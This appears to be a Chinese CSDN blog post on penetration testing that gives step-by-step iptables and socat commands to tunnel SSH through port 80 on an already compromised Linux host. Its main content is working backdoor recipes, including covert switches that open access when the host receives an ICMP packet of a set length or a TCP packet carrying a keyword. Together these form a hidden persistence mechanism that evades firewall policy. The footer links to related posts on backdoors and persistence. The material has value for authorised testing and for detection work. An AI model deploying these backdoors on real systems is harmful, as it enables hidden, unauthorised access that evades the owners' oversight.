icmp端口_Linux利用iptables做端口复用

最新推荐文章于 2023-08-15 20:28:59 发布
最新推荐文章于 2023-08-15 20:28:59 发布
阅读量350 收藏
点赞数
文章标签: icmp端口 iptables限制ip访问 linux 22端口不通 linux ping 端口 linux ping端口 linux 关闭端口

目录

iptables做端口复用

方案一:(根据源地址做端口复用)

方案二:(根据源地址源端口做端口复用)

方案三:(利用ICMP协议做遥控开关)

方案四:(利用TCP协议做遥控开关)

ac207c4bd0dbea7d2556594ca10b4984.gif 45827df13cf3bb41546f3c424908f1d6.gif

iptables做端口复用

在做渗透测试的过程中,我们经常会遇到下面这种问题。

目标主机是Linux系统,目标主机防火墙有严格的限制,只允许80端口的流量进入。我们拿到了目标主机的Webshell并且拿到了SSH的账号密码。但是我们不能通过22端口远程连接,必须得利用80端口做端口复用连接。

现在我们的思路就是利用Linux的iptables防火墙的nat表的PREROUTING 链做端口复用,因为nat 表的 PREROUTING 链会在路由决策之前被处理。关于iptables:Linux中的防火墙(Netfilter、Iptables、Firewalld)

(https://xie1997.blog.csdn.net/article/details/82662026)

环境拓扑图如下:

93282ed432ba46778ac46db098d444da.png

b1377c2d6695f5d7d297e406452d7f75.png

0f4b08e56a7766665d8136674a90bea8.gif

方案一:(根据源地址做端口复用)

以下这条命令的作用是将来自192.168.10.13的访问80端口的流量都重定向到22端口。

iptables -t nat -A PREROUTING -p tcp -s 192.168.10.13 --dport 80 -j REDIRECT --to-port 22

ce8e58f279e2e08e1a9e0ffca9ae6af5.png

连接目标主机的80端口,会被重定向到22端口

e3926c07780fa91e863401e94373913d.png

但是这样做有一个问题就是,我们访问目标主机80端口的流量都会被转给22端口。如果我们不用访问该HTTP服务的话,这是一个好的办法。实战中,我们一般是用VPS连接不用访问HTTP服务,所以在实战中该方法用的比较多。

a52d4b25a09e29918240c4f5c7c40589.png

0f4b08e56a7766665d8136674a90bea8.gif

方案二:(根据源地址源端口做端口复用)

以下的命令是根据源地址源端口做端口复用,也就是只有来自192.168.10.13主机的33333端口的访问80端口的流量会被转给22端口。

iptables -t nat -A PREROUTING -p tcp -s 192.168.10.13 --sport 33333 --dport 80 -j REDIRECT --to-port 22

b1fee8c428044b055626621531b3e752.png

然后我们本机先用socat将本地44444端口的流量以源端口33333访问192.168.10.129的80,然后我们SSH本地的44444端口即可。

nohup socat tcp-listen:44444,fork,reuseaddr tcp:192.168.10.129:80,sourceport=33333,reuseaddr &

ssh -p 44444 root@127.0.0.1

c9844f112035ffe37993c45f69c848ce.png

但是这样做有一个问题就是不支持多连接 如果想创建两个 SSH 连接就会出错,因为本地的 33333 端口已经被第一个 SSH 连接占用了。

0f4b08e56a7766665d8136674a90bea8.gif

方案三:(利用ICMP协议做遥控开关)

利用 ICMP 做遥控开关。缺点在于如果目标在内网,你是无法直接 ping 到它的。

iptables -t nat -N LETMEIN             #创建端口复用链

iptables -t nat -A LETMEIN -p tcp -j REDIRECT --to-port 22   #创建端口复用规则,将流量转发至 22 端口

iptables -t nat -A PREROUTING -p icmp --icmp-type 8 -m length --length 1139 -m recent --set --name letmein --rsource -j ACCEPT  #开启开关,如果接收到一个长为 1139 的 ICMP 包,则将来源 IP 添加到加为letmein的列表中

iptables -t nat -A PREROUTING -p icmp --icmp-type 8 -m length --length 1140 -m recent --name letmein --remove -j ACCEPT          #关闭开关,如果接收到一个长为 1140 的 ICMP 包,则将来源 IP 从 letmein 列表中去掉

iptables -t nat -A PREROUTING -p tcp --dport 80 --syn -m recent --rcheck --seconds 3600 --name letmein --rsource -j LETMEIN    #如果发现 SYN 包的来源 IP 处于 letmein 列表中,将跳转到 LETMEIN 链进行处理,有效时间为 3600 秒

4f072ac51133c7257511885448f1ad9d.png

开启复用

ping -c 1 -s 1111 192.168.10.129        #向目标发送一个长度为 1111 的 ICMP 数据包(加上包头28,总长度实际为1139)

关闭复用

ping -c 1 -s 1112 192.168.10.129        #向目标发送一个长度为 1112 的 ICMP 数据包(加上包头 28,总长度实际为 1140)

 1d42b8b5e332ff33ddbcea62e14e1e55.png

0f4b08e56a7766665d8136674a90bea8.gif

方案四:(利用TCP协议做遥控开关)

利用 tcp 数据包中的关键字做遥控开关,不怕目标在内网。

iptables -t nat -N LETMEIN       #创建端口复用链

iptables -t nat -A LETMEIN -p tcp -j REDIRECT --to-port 22  #创建端口复用规则,将流量转发至 22 端口

iptables -A INPUT -p tcp -m string --string 'threathuntercoming' --algo bm -m recent --set --name letmein --rsource -j ACCEPT   #开启开关,如果接收到一个含有threathuntercoming的TCP包,则将来源 IP 添加到加为letmein的列表中

iptables -A INPUT -p tcp -m string --string 'threathunterleaving' --algo bm -m recent --name letmein --remove -j ACCEPT      #关闭开关,如果接收到一个含有threathunterleaving的TCP包,则将来源 IP 从letmein的列表中移除

iptables -t nat -A PREROUTING -p tcp --dport 80 --syn -m recent --rcheck --seconds 3600 --name letmein --rsource -j LETMEIN    #如果发现 SYN 包的来源 IP 处于 letmein 列表中,将跳转到 LETMEIN 链进行处理,有效时间为 3600 秒

0f01a9ea714b1d311232259c1a6bb3ca.png

开启复用,开启后本机到目标 80 端口的流量将转发至目标的 SSH

echo threathuntercoming | socat - tcp:192.168.10.129:80

关闭复用,关闭后,80 恢复正常:

echo threathunterleaving | socat - tcp:192.168.10.129:80

a3e6ae4dabb48ff29e968b34a2e41cfa.png

5455e2a2e8b6080d6b918ceaaf8ffb51.gif

来源:谢公子的博客

责编:凉粉

b5b5836211e1b2e663f40bb5ee201d60.png b5b5836211e1b2e663f40bb5ee201d60.png f2448780d6a863c798f2616852276407.png由于文章篇幅较长,请大家耐心。如果文中有错误的地方,欢迎指出。有想转载的,可以留言我加白名单。最后,欢迎加入谢公子的小黑屋(安全交流群)(QQ群:783820465) 519d66fc3372cb7ea7dcd2a4c6a66f59.gif b5b5836211e1b2e663f40bb5ee201d60.png b5b5836211e1b2e663f40bb5ee201d60.png
weixin_39771351
关注
Linux利用iptables端口复用
谢公子的博客
05-02 2322
渗透测试的过程中,我们经常会遇到下面这种问题。 目标主机是Linux系统,目标主机防火墙有严格的限制,只允许80端口的流量进入。我们拿到了目标主机的Webshell并且拿到了SSH的账号密码。但是该主机的22端口不对外开放。现在我们想远程SSH连接到目标主机。 ...
iptables端口复用后门+sslh
m0_56501091的博客
02-03 273
端口复用是不同的应用程序使用相同的端口进行通讯,在内网渗透中,服务器仅允许指定的端口开放,利用端口复用可以把例如3389端口转发到80端口上进行外部连接。目的:服务器一般部署在内网,仅有web服务用于被访问,我们将其他的服务通过端口复用绑定在80端口上,相当于给自己留下了一个后门。4、创建关闭开关,如果接收到一个长为 1140 的 ICMP 包,则将来源 IP 从 letmein 列表中去掉。3、创建开启开关,如果接收到长1139的ICMP包,则将来源ip添加到letmein的列表中。
iptables端口复用
weixin_62870380的博客
02-05 229
目的:如果发现SYN包的来源IP处于jack列表中,将直接转到HTTP_SSH_PORT链上进行处理,有效时间为3600秒。目的:如果接受到一个长为1139的ICMP包,则将来源IP添加到为jack的列表中。此时使用80端口进行远程连接,实现了80端口22端口复用,且成功连接。五、将发现的数据包转到HTTP_SSH_PORT链上进行处理。五、将发现的数据包转到HTTP_SSH_PORT链上进行处理。五、将发现的数据包转到HTTP_SSH_TO链上进行处理。方式二:利用tcp数据包中的关键字遥控开关。
远程遥控 IPTables 进行端口复用
weixin_43639741的博客
04-17 1051
这篇首发在 ThreatHunter 社区:国内首个专注于高级威胁发现与安全数据分析的社区,请大家多多支持,https://threathunter.org。 有一天坐地铁的时候突然想到利用 iptables nat 表的 PREROUTING 链配合 REDIRECT 应该是可以达到端口复用的效果的。 比如在服务器的 PREROUTING 链里面加一条规则,将到本机 80 端口的流量 REDIR...
kali修改文件权限不够_Linux下的权限维持
weixin_39956036的博客
10-21 2125
Linux权限维持0X00 关于权限维持什么是权限维持?我们可以直接简单的把权限维持理解为我们在目标上安装了一个后门,权限维持的目的是保证自己的权限不会掉,一直控制住目标.0X01 获得初始权限Linux有很多种反弹shell的方法,反弹shell的好处主要是操作过程中会更加方便,对我个人来说,主要是命令补全,总之,从权限维持的角度来说,可以更好的去执行一些操作.能否反弹shell,要根...
远程遥控iptables进行端口复用以及SSLH工具使用
m0_68390300的博客
02-02 299
iptables端口复用以及sslh工具使用
iptables入门和提高
misisippi68的博客
04-18 371
iptables是关于安全的,不得不把基础先搞清楚。 什么是链、规则和表,iptables的命令格式 linux防火墙的实现实在内核中,具体工作在网络的哪一层,查了查百度,似乎在网络层,但我不确定。 内核中的一个数据包处理模块netfilter,它的功能有: 1)网络地址转换(NAT) 2)数据包内容修改 3)数据包过滤【防火墙功能】 我们在这个后面“表”其实是对应的。 链 图中棕色位置就是i...
揭秘MySQL端口配置与管理的10大秘诀:全面解析端口优化策略
本节将介绍MySQL端口配置的基础知识,包括端口号的范围、常见端口号的分配和使用,以及端口监听和防火墙设置。 **1.1 端口号的范围和限制** TCP/IP协议使用16位端口号,范围为0~65535。其中,0~1023为系统保留端口...
linux系统下端口复用技术
09-23
linux系统下端口复用技术,介绍Linux系统端口复用的教程
iptables实现端口复用
好好睡觉
02-02 1659
iptables端口复用、centos下的sslh使用
linux下用用iptables端口映射的shell
我的专栏
03-12 174
情形一:跨网络、跨主机的映射Full-Nat 我们想到达主机B的80端口,但是由于网络限制可能无法直接完成。但是我们可以到达主机A的8080端口,而主机A可以直接到达B的80端口。 这时候可以使用iptables,将主机B的80端口映射到主机A的8080端口,通过访问A的8080相当于访问B的80。实现如下: 在主机A上直接如下命令,实现端口映射的Full-Nat #!/bin/bash ...
IPtables进行端口复用
weixin_64311421的博客
02-02 628
iptables端口复用的两种方式
iptables端口复用_远程操控
m0_63069714的博客
02-02 331
目的:如果发现SYN包的来源IP处于jack列表中,将直接转到HTTP_SSH_PORT链上进行处理,有效时间为3600秒。缺点:如果目标在内网,有可能无法直接 ping 到它,原因可能存在对方使用防火墙将ping直接关闭。目的:如果接受到一个长为1139的ICMP包,则将来源IP添加到为jack的列表中。目的:如果收到一个长为1140的ICMP包,则将来源IP从jack列表中去掉。此时使用80端口进行远程连接,实现了80端口22端口复用,且成功连接。此时使用80端口,进行远程连接将无法连接成功。
远程遥控iptables实现端口复用
weixin_66218784的博客
02-08 120
作业:端口复用
远程遥控IPTables进行端口复用
最新发布
m0_68976043的博客
08-15 814
含义:如果新来ip在我们之前添加的列表中,我们就会转到自定义链,自定义链就会将我们流量转至22端口上。
iptables详解(7):iptables扩展之udp扩展与icmp扩展
yetugeng的专栏
06-16 204
前文中总结了iptables的tcp扩展模块,此处,我们来总结一下另外两个跟协议有关的常用的扩展模块,udp扩展与icmp扩展。 udp扩展 我们先来说说udp扩展模块,这个扩展模块中能用的匹配条件比较少,只有两个,就是--sport与--dport,即匹配报文的源端口与目标端口。 没错,tcp模块中也有这两个选项,名称都一模一样。 只不过udp扩展模块的--sport与--dport是用于匹配UDP协议报文的源端口与目标端口,比如,放行samba服务的137与138这两个UDP端口,示例如下.
Linux操作系统下IPTables配置方法详解
weixin_34128501的博客
07-25 666
如果你的IPTABLES基础知识还不了解,建议先去看看。 们来配置一个filter表的防火墙 1、查看本机关于IPTABLES的设置情况 [root@tp ~]# iptables -L -n Chain INPUT (policy ACCEPT) target prot opt source destination Chain FORWARD (po...
Linux IPTABLES基础配置与常用端口开放指南
Linux下的IPTABLES配置是一种强大的网络访问控制工具,用于管理Linux系统中的包过滤策略。本文将深入讲解如何在安装Linux后配置filter表的防火墙,确保网络安全并允许特定端口的流量。 首先,对于那些不熟悉...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值